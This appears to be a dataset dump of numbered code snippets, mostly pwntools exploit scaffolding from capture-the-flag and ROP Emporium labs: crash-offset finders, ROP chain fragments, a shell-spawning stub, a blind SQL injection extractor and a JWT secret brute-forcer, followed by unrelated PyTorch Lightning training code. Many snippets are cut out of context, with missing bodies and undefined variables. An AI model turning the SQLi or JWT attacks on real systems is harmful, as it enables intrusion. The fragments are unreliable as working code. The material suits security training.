# Launch process and send payload
p = process(exe)
p.sendlineafter('Please dont hack me', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
ip_offset = cyclic_find(rot13(p.corefile.read(p.corefile.sp, 4).decode()))
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,474 | from pwn import *
import codecs
def rot13(s):
exe = './ropmev2'
info("leaked_address: %#x", leaked_addr)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('Please dont hack me', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
ip_offset = cyclic_find(rot13(p.corefile.read(p.corefile.sp, 4).decode()))
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,475 | from pwn import *
exe = './jeeves'
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('Hello, good sir!', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
eip_offset = cyclic_find(p.corefile.rbp)
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,476 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './chall'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,477 | from pwn import *
import requests
import re
from itertools import cycle
import logging
def sql_inject(sqli_pt1, variable, sqli_pt2):
def guess_len(guess_type, sqli_pt1, sqli_pt2):
# Guess length of DB name, table count etc
for i in range(1, 100):
# Submit SQLi string
response = sql_inject(sqli_pt1, str(i), sqli_pt2)
# Extract the response we're interested in
error_message = re.search(r'User.*\.', response.text).group(0)
debug(error_message)
# If we've found the DB name length, return
if "MISSING" not in error_message:
success(guess_type + str(i) + '\n\n')
return i | null |
14,478 | from pwn import *
import requests
import re
from itertools import cycle
import logging
def sql_inject(sqli_pt1, variable, sqli_pt2):
def guess_name(guess_type, sqli_pt1, sqli_pt2, name_len, min_char_initial, max_char_initial):
name = ""
for i in range(1, name_len + 1):
# Need to reset all these after we find each char
found_next_char = 0
min_char = min_char_initial
max_char = max_char_initial
current_char = int((min_char + max_char) / 2) # start half way through alphabet ('m')
# Should we check greater than or less than?
comparison_types = cycle(['<', '>'])
comparison = next(comparison_types)
while(found_next_char != 2):
# Submit SQLi string ('i' used for substring index, 'current_char' used for finding next char in name)
response = sql_inject(sqli_pt1 + str(i) + "," + str(i) + "))" + comparison, str(current_char), sqli_pt2)
# Extract the response we're interested in
error_message = re.search(r'User.*\.', response.text).group(0)
debug(error_message)
# If ID shows "exists" then condition is true e.g. char > 97
if "MISSING" not in error_message:
# Reset our found_next_char counter
found_next_char = 0
# Next char is greater than the char we just tested
if comparison == '>':
min_char = current_char
# Otherwise, next char is lower than the one we just tested
else:
max_char = current_char
# Reset the current char to test value
current_char = int((min_char + max_char) / 2)
# If ID shows "MISSING" then condition is false e.g. !(char > 97)
else:
# Reverse the comparison check
comparison = next(comparison_types)
# Once this hit '2' in a row we know we've got the right value
found_next_char += 1
# We found our char
name += chr(current_char)
info("Found char(" + str(i) + "): " + chr(current_char))
# We got the whole DB name
success(guess_type + name + '\n\n')
return name | null |
14,479 | import jwt
import base64
secret_key = "intigriti"
print(f"Original token: {token}\n")
print(f"\nModified token: {modified_token}\n")
def verify_token(token):
try:
decoded_token = jwt.decode(token, secret_key, algorithms=["HS256"])
print("Verification Result: Token is valid.")
except jwt.exceptions.InvalidSignatureError:
print("Verification Result: Signature mismatch. Token is invalid.") | null |
14,480 | import jwt
jwt_token = 'INSERT_TOKEN_HERE'
def attempt_fuzzing(secret_key, algorithm):
try:
decoded = jwt.decode(jwt_token, secret_key, algorithms=[algorithm])
print(f"Valid key found: {secret_key}")
print(f"Decoded payload: {decoded}")
return True
except jwt.InvalidSignatureError:
return False
def fuzz_secret_key(wordlist):
header = jwt.get_unverified_header(jwt_token)
algorithm = header.get("alg")
if not algorithm:
print("Algorithm not found in JWT header.")
return None
else:
print(f"Algorithm: {algorithm}")
with open(wordlist, "r") as file:
for line in file:
secret_key = line.strip()
if attempt_fuzzing(secret_key, algorithm):
return secret_key
return None | null |
14,481 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_ret2win'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,482 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_changeme'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,483 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_changeme2'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,484 | from pwn import *
gdbscript = '''
init-pwndbg
break *0x401148
continue
'''.format(**locals())
exe = './stack_shellcode'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,485 | from pwn import *
exe = './stack_shellcode'
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.recvline()
p.sendline(payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,486 | from pwn import *
from os import environb as env
gdbscript = '''
init-pwndbg
b *main
b *greet+140
continue
'''.format(**locals())
exe = './stack_int-overflow'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,487 | from pwn import *
from os import environ as env
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_overwrite-env'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,488 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_overwrite-function-pointers'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,489 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './heap_ret2win'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,490 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './heap_overwrite'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,491 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './heap_use-after-free'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,492 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = '/opt/phoenix/i486/heap-three'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,493 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './secureserver'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,496 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './ret2win_params'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,497 | from pwn import *
exe = './ret2win_params'
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter(b':', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
ip_offset = cyclic_find(p.corefile.pc) # x86
# ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,501 | from pwn import *
exe = './ret2win_params'
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter(b':', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,504 | from pwn import *
gdbscript = '''
init-pwndbg
break *0x0804921f
break *0x08049253
break *0x0804925e
continue
'''.format(**locals())
exe = './canary'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,505 | from pwn import *
gdbscript = '''
init-pwndbg
piebase
continue
'''.format(**locals())
exe = './pie_server'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,506 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './pie_server'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,509 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './ret2win'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,511 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './server'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,513 | from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './got_overwrite'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,514 | from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload
io = start()
io.sendline(b'/bin/sh')
io.interactive()
def send_payload(payload):
io.sendline(payload)
return io.recvline() | null |
14,515 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './split32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,516 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './split'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,517 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './write432'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,518 | from pwn import *
info("%#x data_section_address", data_section_address)
info("%#x pop_edi_pop_ebp", pop_edi_pop_ebp)
info("%#x mov_edi_ebp", mov_edi_ebp)
info("%#x print_file", print_file)
eip_offset = find_eip(100, start())
payload = flat(
asm('nop') * eip_offset, # Offset - 44 bytes
pop_edi_pop_ebp, # Pop .data (1) location into edi and 4 byte string (2) to ebp
data_section_address, # 1
'flag', # 2
mov_edi_ebp, # Move string (2) to memory location (1) stored in edi
# Repeat for remaining part of string
pop_edi_pop_ebp, # Pop .data (1) location into edi and 4 byte string (2) to ebp
data_section_address + 0x4, # 1 (an extra 4 bytes since we wrote "flag")
'.txt', # 2
mov_edi_ebp, # Move string (2) to memory location (1) stored in edi
print_file, # Call print_file()
0x0, # Return pointer
data_section_address # Location of flag.txt string
)
def find_eip(pattern_size, p):
# We will send a 'cyclic' pattern which overwrites the return address on the stack
payload = cyclic(pattern_size)
# PWN
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Open up the corefile
core = p.corefile
# Print out the address of EIP at the time of crashing
eip_value = core.eip
eip_offset = cyclic_find(eip_value)
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,519 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './write4'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,520 | from pwn import *
info("%#x data_section_address", data_section_address)
info("%#x pop_r14_pop_r15", pop_r14_pop_r15)
info("%#x mov_r14_r15", mov_r14_r15)
info("%#x print_file", print_file)
payload = flat(
asm('nop') * eip_offset, # Offset - 44 bytes
pop_r14_pop_r15, # Pop .data (1) location into r14 and 4 byte string (2) to r15
data_section_address, # 1
'flag.txt', # 2 - Note we can do 8 bytes as 64-bit
mov_r14_r15, # Move string (2) to memory location (1) stored in r14
# Pop the data address to RDI and call print_file
pop_rdi,
data_section_address,
print_file
)
def find_eip(pattern_size, p):
# We will send a 'cyclic' pattern which overwrites the return address on the stack
payload = cyclic(pattern_size)
# PWN
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Open up the corefile
core = p.corefile
# Print out the address of RSP at the time of crashing
rsp_value = core.rsp
pattern = core.read(rsp_value, 4)
rip_offset = cyclic_find(pattern)
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,522 | from pwn import *
exe = './vuln'
def find_ip(payload):
# Launch process and send payload
p = process(exe, level='warn')
p.sendlineafter(b'>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
warn('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,523 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './fluff32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,524 | from pwn import *
exe = './fluff32'
eip_offset = find_eip(cyclic(100))
info("%#x data_section_address", data_section_address)
info("%#x pop_ebp", pop_ebp)
info("%#x mov eax, ebp; mov ebx, 0xb0bababa; pext edx, ebx, eax; mov eax, 0xdeadbeef; ret;", long_pext_gadget)
info("%#x pop ecx; bswap ecx; ret;", bswap_ecx)
info("%#x xchg byte ptr [ecx], dl; ret;", xchg_ecx_dl)
info("%#x print_file", print_file)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP at the time of crashing
eip_offset = cyclic_find(p.corefile.eip)
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,525 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './fluff'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,526 | from pwn import *
exe = './fluff'
info("%#x data_section_address", data_section_address)
info("%#x pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx; ret;", bextr_rbx_rcx_rdx)
info("%#x xlat BYTE PTR ds:[rbx]; ret;", xlatb)
info("%#x pop rdi; ret;", pop_rdi)
info("%#x stosb byte ptr [rdi], al; ret;", stosb_rdi_al)
info("%#x print_file", print_file)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RSP (RIP) at the time of crashing
rip_offset = cyclic_find(p.corefile.read(p.corefile.rsp, 4))
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,527 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './ret2win32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,528 | from pwn import *
gdbscript = '''
init-peda
break
'''.format(**locals())
exe = './ret2win'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,529 | from pwn import *
gdbscript = '''
init-gef
break *0x08048547
'''.format(**locals())
exe = './badchars32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,530 | from pwn import *
exe = './badchars32'
eip_offset = find_eip(cyclic(100, alphabet='bcdefhijk'))
info(io.recvline_contains('badchars are'))
info("%#x data_section_address", data_section_address)
info("%#x pop_esi_pop_edi_pop_ebp", pop_esi_pop_edi_pop_ebp)
info("%#x mov_edi_esi", mov_edi_esi)
info("%#x pop_ebp", pop_ebp)
info("%#x pop_ebx", pop_ebx)
info("%#x xor_ebp_bl", xor_ebp_bl)
info("%#x print_file", print_file)
info("flag.txt XORd with %d: %s", value_to_xor_with, xored_string)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP at the time of crashing
eip_offset = cyclic_find(p.corefile.eip, alphabet='bcdefhijk')
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,531 | from pwn import *
gdbscript = '''
init-gef
break print_file
'''.format(**locals())
exe = './badchars32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,532 | from pwn import *
exe = './badchars32'
eip_offset = find_eip(cyclic(100, alphabet='bcdefhijk'))
info(io.recvline_contains('badchars are'))
info("%#x data_section_address", data_section_address)
info("%#x pop_esi_pop_edi_pop_ebp", pop_esi_pop_edi_pop_ebp)
info("%#x print_file", print_file)
info("flag.txt XORd with %d: %s", value_to_xor_with, xored_string)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP at the time of crashing
eip_offset = cyclic_find(p.corefile.eip, alphabet='bcdefhijk')
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,533 | from pwn import *
gdbscript = '''
init-gef
continue
'''.format(**locals())
exe = './badchars'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,534 | from pwn import *
exe = './badchars'
info(io.recvline_contains('badchars are'))
info("%#x data_section_address", data_section_address)
info("%#x pop_r12_r13_r14_r15", pop_r12_r13_r14_r15)
info("%#x mov_r13_r12", mov_r13_r12)
info("%#x pop_r14_r15", pop_r14_r15)
info("%#x xor_r15_r14", xor_r15_r14)
info("%#x pop_rdi", pop_rdi)
info("%#x print_file", print_file)
info("flag.txt XORd with %d: %s", value_to_xor_with, xored_string)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RIP at the time of crashing
pattern = p.corefile.read(p.corefile.rsp, 4)
rip_offset = cyclic_find(pattern, alphabet='bcdefhijk')
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,536 | from pwn import *
exe = './badchars'
info(io.recvline_contains('badchars are'))
info("%#x data_section_address", data_section_address)
info("%#x pop_r12_r13_r14_r15", pop_r12_r13_r14_r15)
info("%#x mov_r13_r12", mov_r13_r12)
info("%#x pop_rdi", pop_rdi)
info("%#x print_file", print_file)
info("flag.txt XORd with %d: %s", value_to_xor_with, xored_string)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RIP at the time of crashing
pattern = p.corefile.read(p.corefile.rsp, 4)
rip_offset = cyclic_find(pattern, alphabet='bcdefhijk')
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,537 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './ret2csu'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,538 | from pwn import *
exe = './ret2csu'
info("%#x ret2win", ret2win)
info("%#x pop rdi; ret", pop_rdi)
info("%#x pop rbp; pop rbx; pop r12; pop r13; pop r14; pop r15; ret", pop_rbx_rbp_r12_r13_r14_r15)
info("%#x mov rdx, r15; mov rsi, r14; mov edi, r13, call QWORD PTR [r12+rbx*8]; ret", csu_mov)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RSP (RIP) at the time of crashing
rip_offset = cyclic_find(p.corefile.read(p.corefile.rsp, 4))
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,539 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './callme32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,540 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './callme'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,541 | from pwn import *
import re
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './pivot32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,542 | from pwn import *
import re
exe = './pivot32'
eip_offset = find_eip(cyclic(100))
info("foothold_plt: %#x", foothold_plt)
info("foothold_got: %#x", foothold_got)
info("puts_plt: %#x", puts_plt)
info("pivot_addr: %#x", pivot_addr)
info("foothold_offset: %#x", foothold_offset)
info("ret2win_offset: %#x", ret2win_offset)
info("pop eax; ret; %#x", pop_eax)
info("xchg eax, esp; ret; %#x", xchg_eax_esp)
info("Sending first payload to leak foothold_function@got address")
info("Sending second payload to stack pivot")
info("Leaked foothold_function@got:")
info("foothold_leak: %#x", foothold_leak)
info("libpivot32_base: %#x", libpivot32_base)
info("ret2win_addr: %#x", ret2win_addr)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', "") # We need to deal with initial prompt
# Then we can send payload (when it asks for stack smash)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP at the time of crashing
eip_offset = cyclic_find(p.corefile.eip)
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,543 | from pwn import *
import re
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './pivot'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,544 | from pwn import *
import re
exe = './pivot'
info("foothold_plt: %#x", foothold_plt)
info("foothold_got: %#x", foothold_got)
info("puts_plt: %#x", puts_plt)
info("pivot_addr: %#x", pivot_addr)
info("foothold_offset: %#x", foothold_offset)
info("ret2win_offset: %#x", ret2win_offset)
info("pop rdi; ret; %#x", pop_rdi)
info("pop rax; ret; %#x", pop_rax)
info("xchg rax, esp; ret; %#x", xchg_rax_esp)
info("Sending first payload to leak foothold_function@got address")
info("Sending second payload to stack pivot")
info("Leaked foothold_function@got:")
info("foothold_leak: %#x", foothold_leak)
info("libpivot32_base: %#x", libpivot32_base)
info("ret2win_addr: %#x", ret2win_addr)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', "") # We need to deal with initial prompt
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RSP (RIP) at the time of crashing
rip_offset = cyclic_find(p.corefile.read(p.corefile.rsp, 4))
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,547 | from pytorch_lightning import LightningModule, Callback, Trainer
from pytorch_lightning import seed_everything
from pytorch_lightning.loggers import LightningLoggerBase
import hydra
from omegaconf import DictConfig
from typing import List
from src.utils import template_utils as utils
import warnings
def train(config: DictConfig):
if config['print_config']:
utils.print_config(config)
if "seed" in config:
seed_everything(config['seed'])
# Init PyTorch Lightning model ⚡
model: LightningModule = hydra.utils.instantiate(config['model'])
# Init PyTorch Lightning datamodule ⚡
datamodule: LightningModule = hydra.utils.instantiate(config['datamodule'])
datamodule.setup()
# Init PyTorch Lightning callbacks ⚡
callbacks: List[Callback] = []
if "callbacks" in config:
for _, cb_conf in config['callbacks'].items():
if "_target_" in cb_conf:
callbacks.append(hydra.utils.instantiate(cb_conf))
# Init PyTorch Lightning loggers ⚡
logger: List[LightningLoggerBase] = []
if "logger" in config:
for _, lg_conf in config['logger'].items():
if "_target_" in lg_conf:
logger.append(hydra.utils.instantiate(lg_conf))
# Init PyTorch Lightning trainer ⚡
trainer: Trainer = hydra.utils.instantiate(
config['trainer'], callbacks=callbacks, logger=logger
)
# Send some parameters from config to all lightning loggers
utils.log_hparams_to_all_loggers(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=callbacks,
logger=logger
)
# Train the model
trainer.fit(model=model, datamodule=datamodule)
# Evaluate model on test set after training
# trainer.test()
# Make sure everything closed properly
utils.finish(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=callbacks,
logger=logger
)
# Return best achieved metric score for optuna
optimized_metric = config.get("optimized_metric", None)
if optimized_metric:
return trainer.callback_metrics[optimized_metric] | null |
14,548 | import os.path as osp
import time
import cv2
import torch
